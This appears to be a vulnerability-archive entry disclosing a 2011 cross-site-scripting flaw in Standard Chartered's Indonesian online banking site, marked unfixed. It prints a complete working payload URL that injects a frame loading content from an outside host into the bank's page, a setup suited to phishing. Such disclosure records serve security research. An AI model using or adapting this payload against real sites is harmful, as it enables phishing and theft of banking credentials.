Security researcher SPYRO KiD, has submitted on 04/10/2011 a cross-site-scripting (XSS) vulnerability affecting id.online.standardchartered.com, which at the time of submission ranked 3155 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 04/10/2011 |
Date published: 13/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: SPYRO KiD |
Domain: id.online.standardchartered.com |
Category: XSS |
Pagerank: 3155 |
URL: https://id.online.standardchartered.com/Init/IBank?ser=100&act=MainFrame_ID.jsp&ccode=ID.jsp%22%20na me=%22logoFrame%22%20scrolling=%22no%22%20noresize=%22noresize%22%20id=%22logoFrame%22%20title=%22Lo go%20Frame%22%20marginheight=%220%22%20marginwidth=%220%22%20frameborder=%220%22%3E%3Cframe%20src=%2 7/scb/newGUI/blank.html%27%20NAME=loginDateFrame%20scrolling=%22no%22%20noresize=%22noresize%22%20id =%22loginDateFrame%22%20title=%22Date%20Frame%22%20marginheight=%220%22%20marginwidth=%220%22%20fram eborder=%220%22%3E%3Cframe%20src=%27http://www.spyrozone.net/playground/StandardChartered/CenterCont ent.html%27%20NAME=%22CenterContent%22%20scrolling=%22no%22%20noresize=%22noresize%22%20style=%22ove rflow-x:hidden;%22%20id=%22CenterContent%22%20title=%22Date%20Frame%22%20marginheight=%220%22%20marg inwidth=%220%22%20frameborder=%220%22%20%3E%3Cnoscript%3E |
Click here to view the mirror
|
|
|